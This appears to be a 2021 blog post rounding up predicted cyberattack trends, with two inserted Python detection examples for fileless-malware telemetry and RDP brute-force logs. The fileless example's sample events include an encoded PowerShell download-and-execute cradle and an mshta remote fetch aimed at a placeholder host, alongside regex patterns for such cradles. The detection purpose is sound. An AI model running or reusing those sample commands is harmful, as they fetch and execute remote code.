Saturday, 30 January 2021

Popular cyberattack vectors in 2021

When it comes to keeping up with the myriad ways cybercriminals can conduct a cyberattack, it feels like running at full speed just to stay in place. Nick Itta, VP, APAC, EfficientIP said, "As a result of COVID-19, organisations, communities and homes have had to overcome challenges in order to adapt to changes that came with the new normal. Remote working, deployment of 5G, dependence on cloud apps and commercialisation of automation will increase the vulnerability of a network, causing a rise in ransomware and data theft due to cloud misconfiguration."

Here are some of the many ways industry observers say cybercriminals could deploy cyberattacks in 2021:

Advanced persistent threats (APTs)

An APT is a prolonged, targeted attack on a specific entity or entities with the intention of compromising their systems and gaining information from or about them. "APTs are switching up by targeting the air-gap network, and we can expect more attacks from these threats in 2021. (Cybercriminals are) also attempting to switch to multiplatform malware which threatens Linux and Mac operating systems," Malwarebytes Labs said.

The company also said that APTs are going to be found on mobile devices and that malicious documents are the main initial vector. While malicious macros were common, they are now less easy to detect as they could be embedded in Excel formulas, Malwarebytes noted.

Deepfakes

LogRhythm has predicted that deepfakes will become a significant threat to business integrity. "COVID-19 has forced in-person communication to go virtual, which means businesses are relying on videoconferencing to conduct meetings more than ever before. While the notion of deepfakes may not be new, they are getting increasingly sophisticated and are becoming remarkably easy to generate. 

"Take ThisPersonDoesNotExist.com, for example, which leverages artificial intelligence (AI) to create completely believable images of people that don’t exist in real life. If this process can be conducted with relatively little information, then certainly hackers can leverage work profiles used for videoconferencing technology — which have employees’ names and pictures automatically associated with them — to create convincing fakes," warned Carder of LogRhythm.

Bjorn Engelhardt, VP of APAC at Forcepoint, forecast that disinformation is inevitable. "There is no silver bullet for decreasing disinformation. Everyone must be diligent about questioning what they see online," he said.

Emotet

Malwarebytes Labs warns that the Emotet Trojan will surface "well into 2021 and beyond". Emotet is primarily spread through spam emails, but could be delivered as a malicious script, macro-enabled document files, or malicious links, the company said. "Emotet emails may contain familiar branding designed to look like a legitimate email. It may try to persuade users to click the malicious files by using tempting language about 'Your Invoice', 'Payment Details', or possibly an upcoming shipment from well-known parcel companies," Malwarebytes said.

The top five sectors that Emotet targeted in Singapore in 2020 included the manufacturing, financial services, media, aviation and healthcare sectors, Malwarebytes said.

Fileless malware

ESET has been talking about “fileless malware” attacks, which piggyback on the operating system’s own tools and processes and leverage them for malicious purposes. According to the company, these techniques have been employed in various cyberespionage campaigns and by various malicious actors recently, mainly to hit high-profile targets such as government entities.

Camilo Gutiérrez Amaya, ESET Senior Security Researcher, noted, “Fileless threats have been evolving rapidly, and it is expected that in 2021 these methods will be used in increasingly complex and larger-scale attacks. This situation highlights the need for security teams to develop processes leveraging tools and technologies that not only prevent malicious code from compromising computer systems, but that also have detection and response capabilities – even before these attacks fulfill their mission.”
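Because fileless attacks ride on the operating system's own script hosts and utilities, the detection signal lives in process-creation telemetry rather than on disk. The following is an added example, not code from the article or from ESET, showing the kind of triage logic a security team can run over process-creation records (Sysmon Event ID 1 or Security 4688 style). The record layout, the heuristics (an Office application spawning a script host, an encoded PowerShell command that decodes to a download cradle, a known living-off-the-land binary fetching a URL) and all sample events are constructed for illustration and are assumptions of this example, not data from any real incident.

```python
import base64
import re

# Heuristic lists used by this example (assumptions, not an exhaustive catalogue).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
LOLBINS_WITH_URL = {"mshta.exe", "regsvr32.exe", "rundll32.exe",
                    "certutil.exe", "bitsadmin.exe"}
# Strings typical of a PowerShell download-and-execute cradle.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|"
                    r"FromBase64String|Net\.WebClient|Invoke-WebRequest", re.I)
# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENC_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def _enc(ps_script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(ps_script.encode("utf-16-le")).decode()


# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')")},
    {"pid": 4121, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"pid": 4122, "parent": "EXCEL.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/update.hta"},
    {"pid": 4123, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev: dict) -> list:
    """Return the list of heuristic reasons this event looks like fileless tradecraft."""
    reasons = []
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-app-spawned-script-host")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-powershell")
        cmd = cmd + " " + decoded          # inspect the decoded payload as well
    if CRADLE.search(cmd):
        reasons.append("download-cradle")
    if image in LOLBINS_WITH_URL and re.search(r"https?://", cmd, re.I):
        reasons.append("lolbin-remote-fetch")
    if HIDDEN.search(cmd):
        reasons.append("hidden-window")
    return reasons


def detect(events: list) -> dict:
    """Map pid -> reasons for every event that triggered at least one heuristic."""
    flagged = {}
    for ev in events:
        reasons = analyse_event(ev)
        if reasons:
            flagged[ev["pid"]] = reasons
    return flagged


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

Decoding the `-EncodedCommand` argument before matching is the step that matters: the base64 blob hides the cradle from naive string searches, and the same decoding is what an analyst does by hand when triaging such an event. The parent/child pairing (an Office process launching a script host) is a strong signal on its own, which is why the example keeps it separate from the command-line content checks.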

Phishing

"In 2020 we saw hackers leverage COVID-19 to distribute a plethora of phishing scams to unsuspecting victims. The number of legitimate emails sent on the topic allowed phishing emails to hide in plain sight. As the race to secure and distribute a vaccine continues, the public will once again seek information on new developments. Attackers will purchase domains and craft emails with this in mind. The amount of content, combined with the thirst for knowledge, will set the stage for a further increase in phishing attacks," predicted LogRhythm.

Ransomware as-a-service

"We’re going to see an increase in less technical criminals leveraging ransomware. 2020 saw a drastic increase in ransomware attacks and many cybercriminals began using new and more sophisticated strains of ransomware. However, even though this trend will continue, there will be a new surge in ransomware-as-a-service as less technical hackers realise the value of ransomware," predicted Serkan Cetin, Technical Director, APJ, One Identity.

"This surge will be fuelled by the ongoing remote workforce as less secure networks and devices being used in the home allow ransomware to travel from personal devices onto the corporate networks. As more companies get hit, companies will start secretly paying the ransomware to avoid having to publicly announce the attack. As a result, stricter and larger fines from regulatory groups will be enforced as a way to encourage companies to proactively fight ransomware."

Cybercriminals are also threatening to leak sensitive data to encourage victims to pay ransoms, said ESET. Tony Anscombe, ESET Chief Security Evangelist, commented, “Companies are becoming smarter, deploying technologies that thwart attacks and creating resilient backup and restore processes, so the bad actors need a ‘Plan B’ to be able to monetise their effort and build resilience into the attack, rather than being reliant on a single form of threat.

“Thwarted attacks or diligent backup and restore processes may no longer be enough to fend off a committed cybercriminal who’s demanding a ransom payment. The success in monetising due to a change of technique offers cybercriminals an increased chance of a return on investment. This is a trend that, unfortunately, I am sure we will witness more of in 2021.”

Remote Desktop Protocol (RDP) attacks

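Brute-forced RDP credentials, which Malwarebytes describes in this section, leave a distinctive trail in the Windows Security log: a burst of failed logons (Event ID 4625) with logon type 10 (RemoteInteractive) from one source address, sometimes followed by a successful logon (4624) from the same address. The following is an added example, not code from the article or from Malwarebytes, of sliding-window detection logic over such records. The tab-separated record layout, the threshold of five failures in ten minutes and the sample lines are all constructed assumptions for illustration; in production the same logic would read events from the log collector.

```python
from collections import defaultdict, deque, namedtuple
from datetime import datetime, timedelta

# Constructed sample lines in the shape: timestamp, event id, logon type,
# source address, target user. Logon type 10 = RemoteInteractive (RDP).
SAMPLE_LOG_LINES = [
    "2021-01-30T02:00:01\t4625\t10\t203.0.113.7\tadministrator",
    "2021-01-30T02:00:05\t4625\t10\t203.0.113.7\tadmin",
    "2021-01-30T02:00:09\t4625\t10\t203.0.113.7\tbackup",
    "2021-01-30T02:00:13\t4625\t10\t203.0.113.7\tjsmith",
    "2021-01-30T02:00:20\t4625\t10\t203.0.113.7\tjsmith",
    "2021-01-30T02:00:31\t4625\t10\t203.0.113.7\tjsmith",
    "2021-01-30T02:00:40\t4625\t3\t203.0.113.9\tsvc_sql",     # network logon, ignored here
    "2021-01-30T02:00:45\t4625\t10\t198.51.100.4\tmjones",    # single typo, benign
    "2021-01-30T02:00:52\t4624\t10\t198.51.100.4\tmjones",
    "2021-01-30T02:01:00\t4624\t10\t203.0.113.7\tjsmith",     # attacker found a valid password
]

Event = namedtuple("Event", "ts event_id logon_type src user")
Alert = namedtuple("Alert", "kind src user ts")


def parse_event(line: str) -> Event:
    """Parse one tab-separated record into an Event."""
    ts, event_id, logon_type, src, user = line.rstrip("\n").split("\t")
    return Event(datetime.fromisoformat(ts), int(event_id), int(logon_type), src, user)


def detect_rdp_attacks(lines, threshold: int = 5, window: timedelta = timedelta(minutes=10)):
    """Flag sources with >= threshold RDP logon failures inside the window,
    and any RDP success from a source that is currently over the threshold."""
    recent_failures = defaultdict(deque)   # src -> timestamps of failures in window
    alerts = []
    for ev in sorted((parse_event(l) for l in lines), key=lambda e: e.ts):
        if ev.logon_type != 10:
            continue                       # only RemoteInteractive (RDP) logons
        q = recent_failures[ev.src]
        while q and ev.ts - q[0] > window:  # drop failures that aged out of the window
            q.popleft()
        if ev.event_id == 4625:
            q.append(ev.ts)
            if len(q) == threshold:        # fire once as the threshold is crossed
                alerts.append(Alert("brute-force", ev.src, ev.user, ev.ts))
        elif ev.event_id == 4624 and len(q) >= threshold:
            # A success right after a failure burst is the higher-severity case:
            # the attacker now holds a working credential.
            alerts.append(Alert("success-after-brute-force", ev.src, ev.user, ev.ts))
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_attacks(SAMPLE_LOG_LINES):
        print(a.kind, a.src, a.user, a.ts.isoformat())
```

The second alert kind is the one worth paging on: a burst of failures is noise on any internet-exposed RDP host, while a success from the same source is the moment the ransomware deployment Malwarebytes describes becomes possible. Filtering on logon type 10 keeps the example focused on RDP; the same window logic applies to other logon types with different thresholds.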
RDP is used for remotely connecting to Windows systems, and cybercriminals look for unsecured RDP services through which to enter enterprise networks. Using social engineering or brute force, threat actors get hold of login credentials for a remote desktop, from which they will be able to deploy ransomware, said Malwarebytes Labs. "Many organisations fail to secure their RDP services against unauthorised access, making it easy for threat actors to execute an RDP attack. There are some things that you can do to make it harder for unauthorised users to access your network. This includes placing the RDP access behind a virtual private network (VPN); using a remote desktop gateway server, which also gives you additional security like two-factor authentication; using strong passwords; limiting users; and enabling network level authentication (NLA)," the company said.

Stalkerware

Stalkerware was prominent in 2020, and will continue to be so in 2021, said Malwarebytes Labs. "Throughout 2020, there has been an uptick in stalkerware-type app detections for Android since shelter-in-place orders (lockdowns) were implemented in March 2020. Stalkerware programs enable an abuser to intrude into a person’s private life and can be used as a tool for abuse in cases of domestic violence and stalking," the company said.

"By installing these applications on a person’s device, abusers can get access to their victim’s messages, photos, social media, geolocation, audio or camera recordings. Such programs run hidden in the background, without a victim’s knowledge or consent."

From January 1 to October 31, 2020, Malwarebytes recorded a 584% increase in monitor app detections, and a 1,044% increase in spyware detections, representing more than 43,000 monitor app detections in the first 10 months of 2020. In an effort to battle stalkerware, the Coalition Against Stalkerware was cofounded by Malwarebytes and established in 2019. It aims to improve detection and mitigation of stalkerware, as well as educate individuals and victims on the technical aspects of the threat. 

Mobile devices as targets

“With a remote workforce come new challenges as employees use personal devices to review sensitive information and work. Through no fault of their own, employees who are working remotely open up an organisation to major vulnerabilities because these mobile devices are much easier for attackers to exploit," said Rick McElroy, Principal Cybersecurity Strategist, VMware Carbon Black.

"In 2021, we will see cybercriminals become more sophisticated in how they attack our mobile devices, ultimately executing an island-hopping scenario. If hackers can get into your Android or iPhone, they’ll then be able to enter your work network, whether it’s deactivating VPNs or breaking down firewalls.

"We will see companies roll out new mobile device policies and infrastructure to allow workers to continue working remotely but with greater awareness of the risks these devices pose and how to protect themselves and the organisation at large. Additionally, a large part of these policies will centre around software updates and patches, ensuring that all personal devices are up to date in order to fend off attackers who have already figured out how to hack into previous software versions.”

Industry observers have also identified new challenges in cybersecurity, and shared new solutions to mitigate risks in a separate blog post.